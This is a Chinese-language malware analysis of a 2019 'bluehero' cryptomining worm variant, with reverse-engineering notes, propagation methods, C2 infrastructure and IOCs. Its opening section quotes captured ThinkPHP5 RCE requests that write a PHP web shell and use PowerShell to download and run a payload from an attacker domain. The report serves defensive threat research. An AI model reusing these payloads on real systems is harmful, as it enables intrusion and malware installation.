Classification:VirusAnalysis

Classification (VirusAnalysis)'s result:

bluehero挖矿蠕虫新变种v20190604简单分析

0x00 概述 捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。 attack:http://1.2.3.4:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd’];system($action);?^>>hydra.php; attack:http://1.2.3.4:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe’,’SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe’);start SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe;   0x01 逆向分析 download.exe: SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b upx脱壳 upx.exe -d “” -o “” 编译时间戳 2019-06-04 04:26:51 PEID PE: packer: UPX(3.94)[NRV,brute] PE: compiler: Microsoft Visual C/C++(6.0)[-] PE: linker: Microsoft Linker(6.0)[EXE32] 入口所在段 UPX1 镜像基地址 0x400000 入口点(OEP) 0x4dcc0   下载母体文件 存储到%SystemRoot%\Temp\SunloglicySrv.exe。 SunloglicySrv.exe upx脱壳 下载配置 http://uio.hognoob.se:63145/cfg.ini 生成ip段 获取本地IP地址,访问http://2019.ip138.com/ic.asp 获取所在公网ip,将生成的ip段包括所在公网的B段,以及随机生成的公网地址保存为ip.txt,启动端口扫描工具对ip的139/445端口进行扫描,将扫描结果保存到result.txt。 用masscan扫描内网和外网的端口 永恒之蓝攻击(32/64)    cve-2019-2725攻击   ipc$爆破 利用内置密码字典进行ipc$远程爆破,爆破登录成功后在目标机器利用psexec工具或者wmic执行远程命令植入木马程序。 cve-2017-5638攻击 cve-2017-10271攻击 好像和2725用的是相同的payload。 thinkphp5 rce攻击 tomcat put 攻击 0x02 流量分析 download.exe SunloglicySrv.exe下载cfg.ini 爆破mssql-1433 0x03 行为分析 SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe(即download.exe) 运行后自删除,并释放后门文件ucokcu.exe(随机六字母文件名) 该程序没有图标,没文件名,具有隐蔽性,后门程序作为系统服务启动。   download.exe下载病毒母体SunloglicySrv.exe 写入到C:\webkitssdk\2.7.92\目录下(不确定是SunloglicySrv.exe还是ucokcu.exe,按微步的沙箱看应该是ucokcu.exe) 木马后门黑客服务器ip。 SunloglicySrv.exe 下载挖矿配置cfg.ini 释放一堆文件: zunnrhu.exe和SunloglicySrv.exe基本一样,含有多种攻击模块。 ipc$爆破,利用mimikatz读取密码。 疑似端口扫描程序。 永恒之蓝。 cve-2017-8464。 生成ip段 利用procdump和psexec。 矿机程序,xmrig挖门罗币。 upx脱壳 矿池 添加计划任务。 添加服务。 攻击7001,weblogic漏洞。 连接黑客服务器80.82.70.188:35791(远控) 相关进程。 0x04 关联分析 fid.hognoob.se 注册时间2019-03-01 00:00:00 过期时间2020/3/1 0:00:00 45.67.14.164(英国 英格兰 伦敦) 21/tcp   open   ftp            Pure-FTPd 80/tcp   open   http           nginx 9898/tcp open   http           Ajenti http control panel fid.hognoob.se服务器iP: 当前解析: 英国45.67.14.164 历史解析记录: 2019-05-15—–2019-06-1445.67.14.164 2019-05-08—–2019-05-08195.128.124.189 2019-04-27—–2019-04-28195.128.124.159 2019-04-15—–2019-04-18195.128.127.237 2019-04-01—–2019-04-1145.67.14.168 2019-03-17—–2019-03-19195.128.127.254 2019-03-13—–2019-03-1345.79.66.44 bt宝塔面板 45.67.14.164 英国 英格兰 伦敦 运营商:pitcommunications.net 195.128.124.140 XMRCoinMiner挖矿木马 运营商:inoventica.ru 俄罗斯莫斯科   80.82.70.234 荷兰 阿姆斯特丹Ecatel公司   185.164.72.143 iis7.5 猜测攻击者应该是欧洲的。   0x05 IOC http://fid.hognoob.se/download.exe(45.67.14.164)//19日更改解析ip(80.82.70.234)//22日更改解析为127.0.0.1/185.164.72.143(荷兰北阿姆斯特丹/伊朗) SHA-256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b http://fid.hognoob.se/SunloglicySrv.exe SHA-256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81 http://uio.hognoob.se:63145/cfg.ini(45.67.14.166) 195.128.124.140  ……